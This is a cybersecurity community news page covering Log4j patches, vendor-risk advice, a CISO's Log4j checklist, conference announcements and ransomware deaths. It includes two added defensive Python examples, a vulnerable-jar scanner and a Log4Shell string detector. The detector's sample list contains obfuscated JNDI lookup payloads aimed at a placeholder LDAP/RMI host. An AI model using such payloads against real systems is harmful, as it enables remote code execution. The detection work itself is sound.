Cybersecurity Community News

This Week in Cyber: The Year of Cryptomining?

This Week in Cyber takes a look at a few of the top news stories across the industry for the week of Jan. 10. Plus, get a peek at what’s coming up on the Data Connectors Community calendar.

Is 2022 the year of cryptomining? Signs, so far, point to yes. Users everywhere were buzzing over the...

In Case You Missed It: Log4j’s Holiday Week

Fifth Patch Released:

Log4j continues to make news during the final week of 2021, as Apache issues the fifth patch, 2.17.1, since the initial vulnerability was uncovered earlier this month.

This patch fixes CVE-2021-44832, an arbitrary code execution flaw, which could be used by threat actors to...

Third Party Risk Assessment Gains Importance Following Log4j

Thanks to the Log4j vulnerabilities, businesses across the world got a not-so-friendly reminder earlier this month that it is vital to assess all third-party software in the organization on a regular basis.

Following the news and the subsequent patches, organizations can use the wake-up call to complete a full third-party risk assessment, according to SecurityScorecard's latest release, “Log4j Vulnerability Technical Report.”

After you have assessed your own organization and the internal impact, the report lists several further steps, including assessing your vendors and checking whether they are still running an older version of Log4j (earlier than 2.17.0, as of this publication). “We have published a new informational signal in SecurityScorecard called Vulnerable Log4j Version Detected. This informational signal does not impact scores and appears on Scorecards where a vulnerable Log4j instance was detected as of December 14th. If you see this signal on a vendor’s scorecard, reach out to them right away,” the report read.

Another way to assess your third-party exposure is to download the Log4Shell Questionnaire provided by SecurityScorecard, send it to all of your software vendors, and then share your findings with your business partners.

 

BEYOND LOG4J

Third-party risk management is not just something an organization should do after a breach; for security experts it should be top-of-mind, according to “Best Practices for Trusted Third Party Risk Management,” also issued by SecurityScorecard.

“Third parties are a necessary part of your enterprise. They are your vendors, your suppliers, your contractors, and your partners. Without them, you can’t do business,” according to the report. “Unfortunately, third parties are also a major source of cyber risk. Cybercriminals often target third-party providers to target their clients’ data and networks, such as the notorious SolarWinds breach at the end of 2020.”

Learn more about the important steps for Automated Risk Management at the CyberConnect Web Briefing on January 20, 2022. Register today.


Hot Topics in Cybersecurity Posted by Jen Greco on Dec 21, 2021

A second Log4j vulnerability (CVE-2021-45046) was uncovered on Dec. 15 and has already been patched. The CVE description states that the original fix for CVE-2021-44228 “was incomplete in certain non-default configurations.” Log4j 2.16.0 fixes the issue by removing support for message lookup patterns and disabling JNDI functionality by default, according to the CVE record.

“The safest thing to do is to upgrade Log4j to a safe version or remove the JndiLookup class from the log4j-core jar,” according to the Apache Log4j Security Vulnerabilities page.
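Both the vendor check in the post above (any log4j-core older than the fixed release) and Apache's two options here (upgrade, or strip JndiLookup out of the jar) come down to knowing exactly which log4j-core archives you ship or run, including the ones buried inside a war or a shaded jar. The scanner below is an added example written for this page; it is not code from Apache, SecurityScorecard or CISA. It walks a directory, opens every jar/war/ear/zip (recursing into nested archives), reads log4j-core's Maven pom.properties for the version, checks whether the JndiLookup class is present, and reports a verdict. The branch thresholds (2.17.1 on the main line, 2.12.4 and 2.3.2 on the Java 7 and Java 6 lines) are my assumption from Apache's advisory at the time of the 2.17.1 patch; re-check them against the current advisory. The archives it scans are constructed in a temporary directory and are not real Log4j artifacts.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear", ".zip")

# Fixed versions per release branch for the 2.17.1 patch cycle (assumption taken
# from Apache's advisory at the time; re-check the current advisory before use).
FIXED_BY_BRANCH = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}
FIXED_DEFAULT = (2, 17, 1)


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """'2.17.1' -> (2, 17, 1); '2.0-beta9' -> (2, 0, 0); garbage -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if m is None:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def verdict(version: Optional[Tuple[int, int, int]], jndi_present: bool) -> str:
    if version is None:
        return "REVIEW: JndiLookup present but no version metadata"
    fixed = FIXED_BY_BRANCH.get(version[:2], FIXED_DEFAULT)
    if version >= fixed:
        return "PATCHED"
    if jndi_present:
        return "VULNERABLE: upgrade to %d.%d.%d" % fixed
    # Apache's fallback mitigation was applied; the newer releases fix more than JNDI.
    return "MITIGATED: JndiLookup removed, still upgrade to %d.%d.%d" % fixed


def inspect_archive(zf: zipfile.ZipFile, label: str, findings: List[Dict]) -> None:
    names = zf.namelist()
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1].strip())
    jndi = JNDI_CLASS in names
    if version is not None or jndi:  # shaded jars have the class but no pom.properties
        findings.append({"location": label, "version": version,
                         "jndi_lookup": jndi, "verdict": verdict(version, jndi)})
    for name in names:  # recurse into nested archives (WEB-INF/lib, bundled jars)
        if name.lower().endswith(ARCHIVES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, label + "!" + name, findings)
            except zipfile.BadZipFile:
                continue


def scan(root) -> List[Dict]:
    """Return one finding per log4j-core found under root (nested archives included)."""
    findings: List[Dict] = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVES:
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, str(path), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _fake_log4j_core(version: str, keep_jndi: bool = True) -> bytes:
    """Constructed stand-in for log4j-core-<version>.jar; not a real Apache artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "version=%s\nartifactId=log4j-core\n" % version)
        if keep_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def demo() -> Dict[str, str]:
    """Scan a constructed tree: a war with two nested cores, a patched jar, a stripped jar."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "lib").mkdir()
        (root / "lib" / "log4j-core-2.17.1.jar").write_bytes(_fake_log4j_core("2.17.1"))
        (root / "lib" / "log4j-core-2.14.1-stripped.jar").write_bytes(
            _fake_log4j_core("2.14.1", keep_jndi=False))
        with zipfile.ZipFile(root / "app.war", "w") as war:
            war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_log4j_core("2.14.1"))
            war.writestr("WEB-INF/lib/log4j-core-2.12.2.jar", _fake_log4j_core("2.12.2"))
        return {f["location"][len(tmp):].lstrip("/\\").replace("\\", "/"): f["verdict"]
                for f in scan(tmp)}


if __name__ == "__main__":
    for location, result in demo().items():
        print(result, location)
```

Point `scan()` at a deployment directory, a container image layer you have unpacked, or a vendor-delivered installer. A REVIEW verdict (JndiLookup present, no version metadata) is the case to chase hardest: it is what a relocated or shaded copy of log4j-core looks like, and it is exactly what a vendor questionnaire tends to miss.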

The Cybersecurity and Infrastructure Security Agency (CISA) updated its Vulnerability Guidance page to reflect this second vulnerability. In the update, the agency added: “A remote attacker can exploit this second Log4j vulnerability to cause a denial-of-service (DOS) condition in certain non-default configurations. Note: affected organizations that have already upgraded to Log4j 2.15.0 will need to upgrade to Log4j 2.16.0 to be protected against both CVE-2021-44228 and CVE-2021-45046.”

CISA has issued guidance telling vendors and affected organizations to ensure they have updated to 2.16.0 in order to protect against both vulnerabilities. The guidance kept moving after this post: the newer posts above already point to 2.17.0 and 2.17.1.

Exploitation of Log4j is officially getting more sophisticated, according to Microsoft, which has observed activity from state-sponsored groups in China, Iran, North Korea and Turkey.

Those include the Chinese state-sponsored group HAFNIUM (of Microsoft Exchange hack fame), whose systems were observed using a DNS service “typically associated with testing activity to fingerprint systems,” Microsoft stated.

“The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,” Microsoft wrote in its security blog.

Current targets include Minecraft servers, according to Microsoft. Minecraft is a popular sandbox and survival video game, regarded as the best-selling video game of all time, with nearly 140 million monthly active users.

“Microsoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by Bitdefender. In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader,” Microsoft wrote on its blog post.

Patch Released for Second Log4j Vulnerability

Hot Topics in Cybersecurity Posted by Jen Greco on Dec 16, 2021

This guest post was originally posted on LinkedIn and has been reposted with permission.

If you are just finding out about log4j, here’s what you need to know as a defender:

1. It’s bad. VERY bad. The level of badness can’t be overstated.

2. Think you’re not exposed because you don’t use Java? I guarantee you at least one of your SaaS vendors/cloud hosting providers/web server providers does.

Java was the most popular programming language of the 90s and early 00s. Hell, it’s still in Stack Overflow’s Top 10 and taught widely in high school & college.

Java is EVERYWHERE.

3. Go through EVERY app, website, and system that you own/use that talks to the internet. This includes self-hosted installs of vendor products and cloud-based services.

Focus first on internet-facing systems that hold sensitive data, secrets, etc. Focus on older “legacy” vendors.

4. This exploit is not only publicly known, the barrier to entry is LOW. Anyone, including your 5yo playing Minecraft, can use this exploit. It’s as simple as typing a few characters into a chat box.

5. Don’t think you’re protected because aUthEnTiCatIoN. This exploit is pre-auth. Which means an attacker DOESN’T NEED TO SIGN IN to your web app/system/whatever in order to pop you.

6. Once you finish assessing your hosted apps, vendor systems, etc., move on to endpoint applications. Java-based apps such as Minecraft and JetBrains IDEs, and vendor clients from the likes of WebEx and Citrix, can bundle a vulnerable Log4j 2; check every vendor advisory rather than assuming a desktop app is safe. You need to patch, patch, patch. If no patch is available, uninstall.

7. Once you’re done with endpoint apps, make sure all your work-from-home folks update their personal devices and home routers.

Yes, even some home routers are susceptible.

I told you it was bad.

Note – don’t rely on your work from home folks to do this right, even with clear instructions.

A lot of them will ignore you.
Prepare for this eventuality.
Make nice with your IT team.
You’re gonna need them.

8. Your immediate reaction will be to set gateway rules to block the exploit string.

Don’t. It won’t work.

There are endless ways to obfuscate the string. Your regex will be no match, I assure you.

9. Instead, focus on patching. Focus on limiting outbound traffic.
If you can block the LDAP/LDAPS protocols entirely in your outbound traffic, do it.

If you can’t, at least block the default LDAP/LDAPS ports (389 and 636). It’s not much, but it’s something: attacker-controlled JNDI servers routinely listen on non-default ports, and the lookup can also go out over RMI or DNS, which is why an allowlist of trusted destinations beats a blocklist of ports.

10. Lastly, communicate with your senior leaders. They should be in the know about this one.

If your leaders ignore you, go to the leadership level above them.

If they ignore you, go to the CEO.

If the CEO ignores you, go to the board.

I told you it was bad.

11. Don’t think this is going to go away any time soon. We’re just starting to get a glimpse of what is being tried out there in the wild.
Buckle up. It’s going to be a wild Christmas.

One final thing to add: if you don’t have edge protection, you can still set firewall rules at the host level. Allow outbound traffic only to trusted IPs. This should be a short list.
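To see why a gateway regex loses this fight, and what a slightly smarter normalizer buys you before the patch lands, here is an added example in Python (my code, written for this page, not the author’s or any vendor’s). It implements a deliberately partial model of Log4j 2’s lookup syntax: nested `${...}` expressions are resolved innermost-first, `lower:` and `upper:` are evaluated, a `:-` default value is taken when the lookup cannot be resolved offline, and anything else (jndi, env, date) is left in place. The sample strings are constructed, the address 198.51.100.7 is an RFC 5737 documentation placeholder, and the expected outcome is that a naive `${jndi:` match misses four of the five obfuscated payloads while the normalizer catches all five. The model is incomplete on purpose: Log4j has more lookups than this, so treat it as a triage aid for logs and WAF telemetry, not a filter you can rely on instead of patching and egress control.

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...} with no nested braces or '$' inside it
INNER = re.compile(r"\$\{([^${}]*)\}")
# What a naive gateway rule typically looks for
NAIVE = re.compile(r"\$\{jndi:", re.IGNORECASE)
# What we look for after normalization
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _eval_lookup(body: str) -> Optional[str]:
    """Evaluate one innermost lookup body. Partial model of Log4j 2 (assumption):
    only lower:/upper: are resolved; ':-' supplies a default when the lookup
    cannot be resolved offline. Returns None for lookups left untouched."""
    name, default = body, None
    if ":-" in body:
        # "env:NOPE:-j" -> ("env:NOPE", "j");  "::-j" -> (":", "j")
        name, default = body.split(":-", 1)
    prefix, sep, arg = name.partition(":")
    if sep:
        if prefix.lower() == "lower":
            return arg.lower()
        if prefix.lower() == "upper":
            return arg.upper()
    return default  # unknown lookup: its default if one was given, else leave as-is


def normalize(text: str) -> str:
    """Collapse nested lookups until only unresolvable ones (e.g. jndi:) remain."""
    while True:
        m = INNER.search(text)
        if m is None:
            break
        value = _eval_lookup(m.group(1))
        if value is None:
            # Freeze the unresolved lookup so the loop does not re-match it;
            # \x00 and \x01 stand in for "${" and "}" and are restored below.
            value = "\x00" + m.group(1) + "\x01"
        text = text[: m.start()] + value + text[m.end():]
    return text.replace("\x00", "${").replace("\x01", "}")


def naive_match(text: str) -> bool:
    """The blocklist rule the author warns against."""
    return NAIVE.search(text) is not None


def detect(text: str) -> bool:
    """Match only after resolving the obfuscation layers we can model."""
    return JNDI.search(normalize(text)) is not None


# Constructed samples; 198.51.100.7 is an RFC 5737 documentation address.
SAMPLES: List[str] = [
    "${jndi:ldap://198.51.100.7:1389/a}",                             # plain payload
    "${${lower:j}ndi:ldap://198.51.100.7:1389/a}",                    # lower: lookup
    "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.7:1389/a}",     # default-value trick
    "${${env:NOPE:-j}ndi:${lower:LDAP}://198.51.100.7:1389/a}",       # env default + nesting
    "${${upper:j}${lower:N}di:rmi://198.51.100.7:1099/a}",            # mixed case, RMI
    "GET /index.html HTTP/1.1 User-Agent: Mozilla/5.0",               # benign request
    "${date:yyyy-MM-dd}",                                             # benign lookup
]


def triage(lines: List[str]) -> List[Tuple[bool, bool]]:
    """(naive regex hit, normalized hit) for each input line."""
    return [(naive_match(line), detect(line)) for line in lines]


if __name__ == "__main__":
    for line, (naive, smart) in zip(SAMPLES, triage(SAMPLES)):
        print(f"naive={naive!s:5} normalized={smart!s:5}  {line}")
```

Run it over a day of access logs and the gap between the two columns is the argument for patching rather than filtering: every extra lookup type Log4j supports (env, sys, date, java, and more) is another rewrite the attacker gets for free and the regex does not.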

• • •
To recap:
1. log4j is very bad
2. you are susceptible
3. patch & filter outbound traffic
4. get IT to help you
5. tell your senior leaders

 

Naomi Buckwalter is an experienced CISO and non-profit director, and is a featured speaker among the Data Connectors Cybersecurity Community. Find her on LinkedIn. 

Ten Things You Must Know About Log4j

Hot Topics in Cybersecurity Posted by Naomi Buckwalter on Dec 14, 2021

The following is a statement shared by the US Secret Service’s Gateway Cyber Task Force at the St. Louis Field Office for the benefit of the public.

DHS – CISA and its partners, through the Joint Cyber Defense Collaborative, are tracking and responding to active, widespread exploitation of a critical remote code execution vulnerability (CVE-2021-44228) affecting Apache Log4j software library versions 2.0-beta9 to 2.14.1. Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system.

CISA has created a webpage, Apache Log4j Vulnerability Guidance, and will actively maintain a community-sourced GitHub repository of publicly available information and vendor-supplied advisories regarding the Log4j vulnerability.

CISA urges organizations to review its Apache Log4j Vulnerability Guidance webpage and upgrade to Log4j version 2.15.0, or apply the appropriate vendor recommended mitigations immediately.

Please follow this link for more information.

CISA Develops Web Page for Apache Log4j Vul …

Hot Topics in Cybersecurity Posted by Data Connectors Newsroom on Dec 14, 2021

For a cybersecurity strategy to succeed, collaboration is vital – whether that’s between teams, organizations or federal agencies.

That was one of many key takeaways at the State of Cyber Conference held in downtown St. Louis on Dec. 1-2.  This event was the result of the country’s top law enforcement agencies coming together to discuss the current cyber threat landscape.

Developed along with the St. Louis InfraGard Alliance and the local offices of the Federal Bureau of Investigation and the US Secret Service, with presentations from the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), this conference was attended by hundreds of senior cybersecurity professionals from across the region.

“When we first started State of Cyber [in 2016], our goal was to get more partnership between the fed agencies and local resources for the 16 critical infrastructures that InfraGard serves,” said David Wren, president of St. Louis InfraGard.

The conference featured content exclusive to attendees, including a briefing from the FBI on the current state of cybersecurity in the region, namely its work in combatting ransomware. Attendees also heard from DHS CISA on how their organizations can partner with the agency to protect themselves against the many threats out there.

The two-day conference closed with an inter-agency panel, featuring representatives from:

  •       The US Secret Service
  •       St. Louis Fusion Center
  •       Missouri Department of Public Safety
  •       DHS-CISA
  •       Missouri State Highway Patrol

During this exclusive session, the experts discussed ways their agencies collaborate with each other and with the public to ensure a high-end cybersecurity infrastructure in the region.

AS SEEN ON TV

It wasn’t just the local cybersecurity pros who took notice of the State of Cyber Conference. Several local news organizations took note of the high-profile speaker list and the timeliness of the event.

“The State of Cyber 2021 is a great opportunity for the Secret Service to meet with corporations and security directors to talk about the trends and tactics we’re seeing imposed on the civilian population and also corporations themselves,” US Secret Service Special Agent in Charge Thomas Landry told Fox2Now. Landry is based in the St. Louis field office, and was featured as a key speaker during the conference. His session, given in collaboration with USSS Senior Special Agent Brian Cockrill, was titled “The USSS Cyber Fraud Task Force Model.” This session gave attendees a better understanding of how the agency, which is (in part) designed to fight financial crimes against US citizens, can aid organizations when it comes to avoiding, combatting and reporting cyber crimes. 

Data Connectors CEO Dawn Morrissey spoke to KMOV4 viewers about one of the biggest cyber threats facing companies of all sizes: ransomware.

“It’s continued to increase, not only the amount of ransom demands, but the frequency of attacks,” she said in the news report. “And it’s affecting everyone from businesses, all the way up to large corporations.”

IN CASE YOU MISSED IT

The Data Connectors team is continuing to partner with InfraGard to present the State of Cyber Virtual Cybersecurity Summit, a complimentary, fully online session intended for cyber professionals in the Midwest and Great Lakes region on Dec. 14-15.

This fully virtual experience features similar panels and discussions from the high-profile lineup of speakers, including an interactive inter-agency panel. Registration is still available.

“State of Cyber 2021” Connects Executiv …

Industry News Posted by Jen Greco on Dec 8, 2021

Law Enforcement, Chief Information Security Officers from Region’s Largest Organizations Convene to Get Ahead of Expanding Cyber Threats

 

ST. LOUIS, MO – November 29, 2021. Data Connectors, representing the largest cybersecurity community in North America, confirmed the details for the State of Cyber 2021 Conference, which will take place December 1st and 2nd, 2021. In partnership with the St. Louis InfraGard Alliance and local field offices of the Federal Bureau of Investigation (FBI) and the US Secret Service, the Chesterfield, MO-based firm will present this year’s in-person and online gatherings, a return from last year’s all-virtual format.

“The United States Secret Service is proud to collaborate with our local, state, and federal partners at the State of Cyber 2021 Conference. Sharing intelligence with them and the organizations responsible for a private infrastructure operating in the St. Louis metropolitan area furthers our investigative mission to thwart crimes against the financial infrastructure of the United States,” stated Thomas Landry, Special Agent in Charge, U.S. Secret Service – St. Louis Field Office.

Landry also headlines the agenda on Wednesday, December 1st.

The conference features prominent Chief Information Security Officer (CISO) executives from the region, as well as industry luminaries, cybersecurity solutions experts, and representatives from government agencies. The two-day agenda represents a combination of the St. Louis Cybersecurity Conference, which has been run annually since 2003, the St. Louis InfraGard Alliance’s State of Cyber event started in 2016, and an annual update for local cyber professionals conducted by the St. Louis Office of the United States Secret Service’ Cyber Fraud Task Force.

Validated professionals in the community who attend the Conference will receive briefings from the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), and hear from local peer executives from organizations such as Mastercard, First Bank and TikTok.

The Conference will also feature a panel discussion on the State of Cyber Inter-Agency Cooperation, and keynotes from public and private sector executives:

  • Richard Quinn, Special Agent in Charge, FBI St. Louis Division
  • Erin Hug, Cyber Intelligence Analyst, Cybersecurity Forensics & Intelligence Unit at Missouri State Highway Patrol
  • Angela Robinson, Cybersecurity Specialist with the Department of Public Safety (DPS)
  • Derek Rieger, Deputy Director of the St. Louis Fusion Center
  • Brian Cockrill, Senior Special Agent – Technical Staff Assistant at the United States Secret Service – St. Louis Field Office
  • Christopher Cockburn, Cybersecurity Advisor at CISA
  • D. Henry, Cyber Security Advisor & Indiana Cybersecurity State Coordinator at CISA

Over 300 members of the Data Connectors Cybersecurity Community are expected to attend this conference. More than 30 community partners and affiliate organizations will also be a part of the gathering including Auth0, Attivo Networks, Darktrace, and Noname Security.

The Conference will take place on Wednesday and Thursday, December 1-2, starting at 8:00 a.m. CST at the Hyatt Regency St. Louis at The Arch, 315 Chestnut St., St. Louis, MO 63102. Registration is FREE for qualified professionals, who can also obtain Continuing Professional Education (CPE) credits for participation.

More information for the Summit can be found at dataconnectors.com/state-of-cyber.

+++++++++

About Data Connectors
Since 1999, Data Connectors (dataconnectors.com) has facilitated collaboration between senior cybersecurity professionals, government/law enforcement agencies, industry luminaries, and solution providers. Today, the community comprises over 650,000 members and 250 Community Partners across North America. Members enjoy informative education, networking and support via award-winning Virtual Summits, live conferences, Web Briefings, and regular communications.

# # #

Note to reporters: If you wish to attend these sessions at no charge, please contact Michael Hiskey, Chief Strategy Officer, at +1.636.778.9495, or info@dataconnectors.com.

“State of Cyber 2021” Brings Together H …

Press Releases Posted by Emily Ramsey on Nov 29, 2021

Cyber incidents kill. They killed before. They will kill again

 

 

Ransomware attacks have taken a deadly turn. Hackers have become more organized and sophisticated, leading to what is alleged to be the first ransomware-related death in September 2019. These threats continue to escalate, making healthcare systems, government operations, and other life-critical organizations prime targets for cybercriminals. It is no longer just about financial loss: when these organizations are attacked and compromised, lives are at stake.

 

In September 2019, the first alleged ransomware-related death occurred at Springhill Medical Center in Alabama. The Wall Street Journal reported on the lawsuit filed by Teiranni Kidd, which is scheduled to go to court in November 2022. In the article “A Hospital Hit by Hackers, a Baby in Distress: The Case of the First Alleged Ransomware Death” by Kevin Poulsen, Robert McMillan, and Melanie Evans, it was reported that Ms. Kidd was admitted to the hospital in the middle of a ransomware attack. The attack cut off access to medical records and to the monitors used to track patients’ vitals. Ms. Kidd’s baby, Nicko Silar, was born with the umbilical cord wrapped around her neck, causing brain damage that killed her nine months later.

The hospital’s slow response to the ransomware attack, together with its initial refusal to tell patients and the public what was really going on, begs the question: was Nicko Silar’s death preventable?

As first reported by The Wall Street Journal, Joshua Corman, senior adviser at the Cybersecurity and Infrastructure Security Agency (CISA), part of the Department of Homeland Security, found evidence that ransomware can lead to dire consequences for hospitals. “We can see that a cyberattack can strain you enough to contribute to excess deaths,” Corman concluded. Had the ransom been paid, or had the hospital had proper security measures in place to defend against such attacks, there is a significant chance Nicko Silar could have been saved.

 

With the rise in such deadly ransomware attacks, insiders have been invited to share their takeaways and best practices for this new threat landscape with Data Connectors’ attendees. One of those experts is Menny Barzilay, CEO at Cytactic. Barzilay addressed the New England Virtual Cybersecurity Summit audience this past August with his keynote presentation, “Cyber incidents kill. They have killed before. They will kill again.” He discussed how life-threatening cyberthreats should be incorporated into the risk management process in a way that lets security experts and decision-makers identify and tackle such threats effectively. He also urged attendees to understand why the cyber industry must adopt the right mindset when human lives are at stake and build that notion into its standards, policies, and methodologies.

 

“Cyber incidents have already cost human lives in the past. And they will soon again. Yet, most cyber professionals haven’t yet fully embraced their responsibility to protect human lives,” he said. “A tectonic shift in the cyber industry is about to happen,” he added.

 

Menny Barzilay writes on all cybersecurity topics like ransomware in his blog “THINK: CYBER.”

In his blog article “Cyber Kills,” Barzilay lays out the numerous ways in which cyberattacks, especially ransomware, can destroy lives. The most terrifying include, “After an attack on emergency call systems (like 911 in the US) we’ll hear about people getting killed because the emergency responder was not available in time, and after an incident in which pictures will be leaked, we’ll hear about people committing suicide.”

In the same vein, Jaycee Roth, Associate Managing Director of Cyber Risk at Kroll, will present “From the Ransomware Frontlines: R-Rated Takeaways” at the upcoming Canada West Virtual Cybersecurity Summit. Echoing Barzilay’s warnings, Roth will address encryption, exfiltration, the rise of triple extortion, and what it means for organizations. She will also walk through the steps that precede ransomware detonation, the precursors worth monitoring for, and how to act before detonation, so that such devastating attacks can be stopped earlier.

Ransomware attacks have escalated significantly over the last few years, and that escalation now reaches people’s lives, from data exploitation to life-threatening interruptions of care. For more resources on ransomware, check our news page for the latest cybersecurity news, or attend one of the upcoming virtual summits and conferences, where ransomware will remain a recurring topic in the community.

Ransomware Kills: An insider look at the tr …

Hot Topics in Cybersecurity Posted by Emily Ramsey on Nov 18, 2021